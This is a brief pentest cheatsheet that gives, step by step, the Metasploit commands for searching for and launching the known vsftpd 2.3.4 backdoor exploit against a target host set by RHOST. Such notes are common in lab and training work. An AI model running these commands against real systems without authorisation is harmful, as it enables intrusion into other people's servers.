Pentest Cheatsheet

Metasploit

start console

msfconsole

search for vuln

search vsftpd

select vuln

use exploit/unix/ftp/vsftpd_234_backdoor

set target

set RHOST <IP of target>

check options to be filled

show options

run exploit

run